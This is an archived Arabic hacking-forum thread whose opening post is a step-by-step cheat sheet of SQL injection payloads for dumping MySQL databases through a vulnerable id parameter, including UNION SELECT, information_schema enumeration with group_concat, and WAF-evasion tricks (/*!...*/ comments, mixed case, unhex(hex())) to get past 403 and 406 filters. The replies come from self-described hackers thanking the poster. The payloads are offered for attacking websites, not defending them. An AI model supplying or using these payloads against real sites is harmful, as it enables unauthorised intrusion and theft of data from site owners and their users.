المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : جميع أوامر SqL Injection أوامر تخطي Forbidden 403 أوامر تخطي Not Acceptable



محمد المطيري
03-02-2012, 08:10 PM
السلآم عليكم ورحمة الله تعالى وبركاتة
كيفكم اعضائنا الحلوين لبى قلوبكم .. اليوم حبيت انقل لكم موضوع اعجنبي
واللي هو يتكلم عن ...............
=====================================
جميع أوامر
SqL Injection
أوامر تخطي
Forbidden 403
أوامر تخطي
Not Acceptable
أوامر التـشفــيــر أثناء الحقن
أوامر تخطي عدم ظهور عدد الأعمدة
==============================
أوامر SqL Injection
==============================
أمر استخراج عدد الأعمدة
==============================
+order+by+
==============================
أمر استخراج العامود المصاب
==============================
+union+select+
==============================
أمر استخراج اسم قاعدة البيانات
==============================
Database()
==============================
أمر استخراج اصدار قاعدة البيانات
==============================
Version()
==============================
أمر استخراج يوزر قاعدة البيانات
User()
==============================
أمر استخراج الجداول
==============================
يوضع هذا الأمر مكان العامود المصاب
==============================
group_concat(table_name)
==============================
ويوضع هذا الأمر في نهاية الرابط
==============================
+from+information_schema.tables+where+table_schema =database()--
==============================
أمر استخراج الأعمدة
==============================
يوضع هذا الأمر مكان العامود المصاب
==============================
group_concat(column_name)
==============================
ويوضع هذا الأمر في نهاية الرابط
==============================
+from+information_schema.columns+where+table_schem a=database()--
==============================
أوامر تخطي Forbidden 403 اثناء استخراج العامود المصاب + استخراج الجداول ولأعمدة
==============================
تخطي Forbidden 403 اثناء استخراج العامود المصاب
==============================
اضافة الفلتر
==============================
/*! */
==============================
على كلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!select*/
==============================
واذا لم تنجح الطريقة العب بكلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
احرف سمول وأحرف كابتل
==============================
تخطي Forbidden 403 اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(table_name)
==============================
ليصبح بهذا الشكل
==============================
/*!GrOuP_CoNcAT(table_name)*/
==============================
وتعديل الامر
==============================
ليصبح بهذا الشكل
==============================
+from+information_schema.tables+where+table_schema =database()--
==============================
تخطي Forbidden 403 اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(column_name)
==============================
ليصبح بهذا الشكل
==============================
/*!GrOuP_CoNcAT(column_name)*/
==============================
وتعديل الامر
==============================
ليصبح بهذا الشكل
==============================
+from+information_schema.columns+where+table_schem a=database()--
==============================
ليصبح بهذا الشكل
==============================
+
==============================
from+information_schema./*!columns*/+where+table_schema=database()--
==============================
أوامر تخطي Not Acceptable
==============================
تخطي Not Acceptable اثناء استخراج العامود المصاب
==============================
اضافة الفلتر
==============================
/*! */
==============================
على كلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!select*/
==============================
واذا لم تنجح الطريقة العب بكلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
احرف سمول وأحرف كابتل
==============================
تخطي
Not Acceptable
اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(table_name)
==============================
ليصبح بالشكل دا
==============================
/*!GrOuP_CoNcAT(table_name)*/
==============================
تخطي Not Acceptable اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(column_name)
==============================
ليصبح بالشكل دا
==============================
/*!GrOuP_CoNcAT(column_name)*/
==============================
أوامر تخطي الحماية من بعض الأوامر
==============================
هذا الأمر نضعه مكان العامود المصاب
==============================
concat(unhex(hex(concat(table_name,0x3a,column_nam e,0x3a,table_schema))))
==============================
وهذا الأمر نضعه في نهاية الرابط
==============================
+from+information_schema.columns--
==============================
أوامر تخطي عدم ظهور عدد الأعمدة
==============================
نقوم باضافة
==============================
+--+
==============================
في نهاية الرابط
==============================
واضافة
العلامة التي بين قوسين
==============================
(')
==============================
بعد
==============================
.php?id=1
==============================
ليصبح بهذا الشكل
==============================
.php?id=1'
==============================
هذه تكون نهاية الموضوع ارجو ان اكون قد وفقت بوضع الأوامر

واتمنا ان يكون الموضوع قد نال اعجابكم ورضاكم

JOKERHACHER
03-03-2012, 08:33 PM
انا دائما اتذمر من باقي المواضيع ومن الاومار الي يجبونها كلها غلط بغلط ولله انت بس يلي رجعتلي ثقتي بنفسي في ثغرة sql انا لما كنت تشوووف الاموامر خطأ انقطع نفسي لعالم الاختراق كلوو لما قرات موضوع نفتح نفسي ولله بدك كفين في السماء يدعولك وانا راح اضيفك على الايميل
بتقبل اوووكي .................!

JOKERHACHER
03-03-2012, 08:35 PM
ويسعدني اني انا اول من يرد عليك

محمد المطيري
03-04-2012, 12:26 AM
انا دائما اتذمر من باقي المواضيع ومن الاومار الي يجبونها كلها غلط بغلط ولله انت بس يلي رجعتلي ثقتي بنفسي في ثغرة sql انا لما كنت تشوووف الاموامر خطأ انقطع نفسي لعالم الاختراق كلوو لما قرات موضوع نفتح نفسي ولله بدك كفين في السماء يدعولك وانا راح اضيفك على الايميل
بتقبل اوووكي .................!



تسلمممم اوكيه ارسل اضافه والله خجلتني مدري وش ارد عليك

youcefingo
05-19-2012, 04:14 PM
شكرا لك اخي علئ الموضوع القيم

refland
10-05-2014, 08:08 PM
كل الفلترة دي المواقع اليوم عامله عليها حماية اتمنىى يكو جديد لانها قديمة

تيتوتيتو2100
10-17-2014, 04:13 PM
بصراحة الشرح باين فية المجهود الكبير رغم انى ممكن للاسف مش فهماها اد كدة بس اكيد هقراها تانى وتالت وعاشر
حتى احاول ان افهم هذا المؤشر انشاء الله شكرا ليك كثيرا على مجهودك